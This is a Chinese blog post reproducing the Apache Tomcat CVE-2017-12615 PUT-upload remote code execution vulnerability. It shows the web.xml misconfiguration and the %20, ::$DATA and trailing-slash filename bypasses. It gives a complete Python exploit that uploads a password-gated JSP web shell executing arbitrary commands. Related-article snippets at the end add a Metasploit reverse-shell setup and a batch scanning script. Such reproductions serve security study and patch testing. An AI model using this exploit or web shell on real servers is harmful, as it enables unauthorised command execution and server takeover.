TOMCAT(CVE-2017-12615)远程代码执行

最新推荐文章于 2025-06-30 15:03:43 发布
最新推荐文章于 2025-06-30 15:03:43 发布
阅读量1.2k 收藏 2
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/nzjdsds/article/details/97635438
本文详细介绍了在Win2003环境下,利用Tomcat 7.0.75的PUT请求方法创建特定格式的文件,从而绕过黑名单验证并实现远程代码执行的过程。通过修改web.xml配置文件,攻击者可以利用此漏洞执行任意代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

复现环境

win2003

tomcat/7.0.75

复现过程

安装jdk和tomcat

 

然后在tomcat的配置文件web.xml中添加下面这段代码,并重启

<init-param>             
        <param-name>readonly</param-name>     
        <param-value>false</param-value> 
</init-param>

 

使用PUT请求,能成功创建test.jpg文件

然后尝试创建test1.jsp,出现404错误

在test1.jsp后面增加%20,再次发送请求,成功创建test1.jsp

另一种方式,把%20更换为::$DATA。也能创建成功

下面是关于::$DATA的讲解

在测试中我们发现,如果上传的文件名字为:test.php::$DATA,会在服务器上生成一个test.php的文件,其中内容和所上传文件内容相同,并被解析。假设我们需要上传的文件内容为:<?php phpinfo();?>下面是上传是会出现的现象:
上传的文件名  服务器表面现象    生成的文件内容
Test.php:a.jpg     生成Test.php  空
Test.php::$DATA  生成test.php  <?php phpinfo();?>
Test.php::$INDEX_ALLOCATION  生成test.php文件夹  
Test.php::$DATA\0.jpg  生成0.jpg  <?php phpinfo();?>
Test.php::$DATA\aaa.jpg  生成aaa.jpg  <?php phpinfo();?>

  PS: 上传test.php:a.jpg的时候其实是在服务器上正常生成了一个数据流文件,可以通过notepad test.php:a.jpg查看内容,而test.php为空也是正常的。
  根据第二个现象,我们可以bypass一些黑名单验证。
  后面我加\0测试的时候是想截断后面的东西,但是发现windows会无视”/””\”这两个符号前面的东西,只识别这俩符号后的字符串。(由于windows把\ /当成了目录,而上传只认识文件名所导致的)

 

还有一种是在末尾增加/,也能创建成功

通过EXP进行攻击

#! -*- coding:utf-8 -*- 

import httplib

import sys

import time

body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''

try:

    conn = httplib.HTTPConnection(sys.argv[1])

    conn.request(method='OPTIONS', url='/ffffzz')

    headers = dict(conn.getresponse().getheaders())

    if 'allow' in headers and \
       headers['allow'].find('PUT') > 0 :

        conn.close()

        conn = httplib.HTTPConnection(sys.argv[1])

        url = "/" + str(int(time.time()))+'.jsp/'

        #url = "/" + str(int(time.time()))+'.jsp::$DATA'

        conn.request( method='PUT', url= url, body=body)

        res = conn.getresponse()

        if res.status  == 201 :

            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]

            print 'shell:', 'http://' + sys.argv[1] + url[:-1]

        elif res.status == 204 :

            print 'file exists'

        else:

            print 'error'

        conn.close()

    else:

        print 'Server not vulnerable'

except Exception,e:

    print 'Error:', e

 

 

后记

影响范围:tomcat7.0.0-7.0.79

解决方式是将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true,才能防止漏洞。

 

Tomcat (CVE-2017-12615 )漏洞复现
战神/calmness的博客
05-31 1194
内容涉及点: 任意写文件漏洞 简介 原理 影响范围 复现过程 自己的心得体会 任意写文件漏洞 简介 如果Tomcat开启了PUT方法(默认关闭,有点鸡肋,但是有些页面需要PUT, 无法关闭),则有可能存在远程命令执行漏洞,攻击者可以利用PUT方法上 传jsp文件,从而造成远程命令执行,getshell等。 原理 漏洞的产生是由于配置不当(非默认配置),将配置文件( conf/web.xml)中...
CVE-2017-12615 tomcat漏洞利用
yuan-ONE的博客
01-11 2067
1.搭建漏洞环境 参考github https://github.com/vulhub/vulhub.git  本文使用文件 vulhub/tomcat/CVE-2017-12615  使用docker-compose 运行靶机 2.执行PUT方法上传木马 #-d 指定内容 curl -v -X PUT -d "younglinuxer" 192.168.123.38:8080/1.jsp...
Apache tomcat远程代码执行验证代码
04-16
Apache tomcat远程代码执行代码
tomcat远程代码执行漏洞验证
04-17
tomcat远程代码执行漏洞验证
Tomcat 远程代码执行漏洞(CVE-2017-12615)修复方案
最新发布
2401_89498534的博客
06-30 354
Tomcat启用了 HTTP PUT方法(例如,将 readonly 初始化参数有默认值设为 false),攻击者可以通过将精心构造的攻击请求向服务器上传包含任意代码的JSP文件。之后,JSP文件中的代码将能被服务器执行,造成任意代码执行漏洞。影响Apache Tomcat 7.x.x, 8.x.x, 9.x.x 版本。Tomcat 远程代码执行漏洞(CVE-2017-12615)修复完成,请检查所有业务是否正常!
tomcat远程代码执行漏洞(cve-2017-12615)复现
qq_40410406的博客
08-10 1142
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。...
Apache TomcatCVE-2017-12615远程代码执行漏洞复现
ximo的博客
04-25 867
漏洞描述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,其中就有远程代码执行漏洞(CVE-2017-12615)。当 启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。 影响版本 Apache Tomcat 7.0.0 - 7.0.81 环境搭建 docker +
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
CVE-2017-12615 Tomcat远程命令执行漏洞
mirocky的博客
10-13 820
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
Jboss多个远程命令执行漏洞(CVE-2017-12149、CVE-2015-7501、CVE-2017-7504)
qq_68163788的博客
06-26 1698
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
针对Tomcat 远程代码执行漏洞(CVE-2017-12615)的一次实战
看不尽的尘埃——博客
01-20 3418
前言 今天想多实践实践Tomcat中间件的漏洞。于是乎,把墨者学院的靶场全做了。 下面来看一下对Tomcat 远程代码执行漏洞的一次战斗! 一开始拿到这个靶场时,都不知道该如何入手,于是去百度搜了相关资料。 找到了一篇好文章,写的简单明了!阅读完后,发现要复现和利用还是很简单的。只要一个burp工具就够了! https://www.freebuf.com/vuls/148283.html...
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 的复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到漏洞效果,请勿非法使用,仅供学习研究
cve-2017-12615_cmd.py
04-26
CVE-2017-12615的稀有检测脚本,方便使用和测试,本脚本请谨慎使用!
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615
weixin_45653478的博客
05-02 1954
在Apache Tomcat服务器中,PUT方法通常用于上传文件。攻击者可以通过发送PUT请求,将恶意文件上传到服务器。当攻击者发送PUT请求时,Tomcat服务器会将请求中的数据写入指定的文件。如果攻击者能够控制文件路径,那么他们可以将恶意文件写入任意位置,从而实现任意文件写入。
Tomcat 远程代码执行漏洞 (CVE-2017-12615)
Hvnt3r的博客
05-28 1451
Tomcat 远程代码执行漏洞 (CVE-2017-12615) 0x00 首先还是通过docker搭建实验环境 ,实验环境需要docker来挂载,docker安装教程:https://blog.youkuaiyun.com/levones/article/details/80474994 下载docker镜像: docker pull medicean/vulapps:t_tomcat_1 ...
Tomcat 远程代码执行漏洞分析(CVE-2017-12615
fly小灰灰的专栏
11-06 7154
1. 漏洞描述 漏洞简述: 当tomcat启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。 CVE编号:CVE-2017-12615 影响版本:Apache Tomcat 7.0.0-
Tomcat任意文件写入(CVE-2017-12615)漏洞复现
weixin_45540609的博客
07-28 2226
一、漏洞原理 影响范围:pache Tomcat7.0.0-7.0.81(默认配置) 如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞,CVE-2017-12615远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的).
Tomcat 任意写入文件漏洞(CVE-2017-12615
ANOrange的博客
03-29 621
Tomcat 任意写入文件漏洞(CVE-2017-12615)漏洞复现
TOMCAT远程代码执行
cheapkiller的博客
08-08 486
首先下载一个apache-tomcat8.5.39。进入bin目录找到setclasspath.bat。在bin目录下打开cmd运行startup.bat。进入文件进行编辑 修改为自己java所在的路径。然后在文件管理器中搜索cgi-bin。然后在里面创建bat文件存在内容。
CVE-2017-12615批量检测
03-18
### 关于 CVE-2017-12615 的批量检测方法 CVE-2017-12615 是 Apache Tomcat 中的一个漏洞,允许攻击者通过启用 PUT 请求来上传任意文件并可能执行远程代码。为了实现对该漏洞的批量检测,可以采用以下几种方式: #### 使用 Metasploit Framework 进行批量检测 Metasploit 提供了针对此漏洞的模块 `exploit/multi/http/tomcat_unauth_upload_exec`,能够用于测试目标系统是否存在该漏洞。以下是具体操作流程: ```bash use exploit/multi/http/tomcat_unauth_upload_exec set RHOSTS <target_ip_range> set PAYLOAD java/shell/reverse_tcp set LHOST <local_host> set LPORT <local_port> run ``` 上述命令会尝试对指定 IP 范围内的主机进行扫描,并报告哪些主机存在漏洞[^2]。 #### 自定义脚本实现批量检测 如果希望更灵活地控制检测过程,则可编写自定义 Python 或 Bash 脚本来完成任务。下面是一个简单的 Python 实现示例: ```python import requests def check_vulnerability(ip, port=8080): url = f"http://{ip}:{port}/" headers = {"Content-Type": "text/plain"} try: response = requests.put(url + "test.txt", data="PWNED", headers=headers, timeout=5) if response.status_code == 201 or response.status_code == 204: print(f"[+] {ip} is vulnerable!") else: print(f"[-] {ip} does not appear to be vulnerable.") except Exception as e: print(f"[!] Error checking {ip}: {e}") if __name__ == "__main__": with open("targets.txt") as file: targets = [line.strip() for line in file] for target in targets: ip, port = target.split(":") check_vulnerability(ip, int(port)) ``` 在此脚本中,程序读取名为 `targets.txt` 的文件,其中每行包含一个待测的目标地址及其端口号(例如:`192.168.1.1:8080`),随后逐一检查这些目标是否易受攻击。 #### 利用 Nmap 插件进行网络扫描 Nmap 社区贡献了许多插件支持各种常见漏洞的探测工作,其中包括 CVE-2017-12615 。运行如下指令即可启动基于 NSE (Nmap Scripting Engine) 的大规模扫描活动: ```bash nmap --script http-tomcat-put -p 8080 <network_range> ``` 这里 `-p 8080` 参数指定了要扫描的服务端口;而 `<network_range>` 应替换为您实际想要覆盖的子网范围或单个IP列表。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值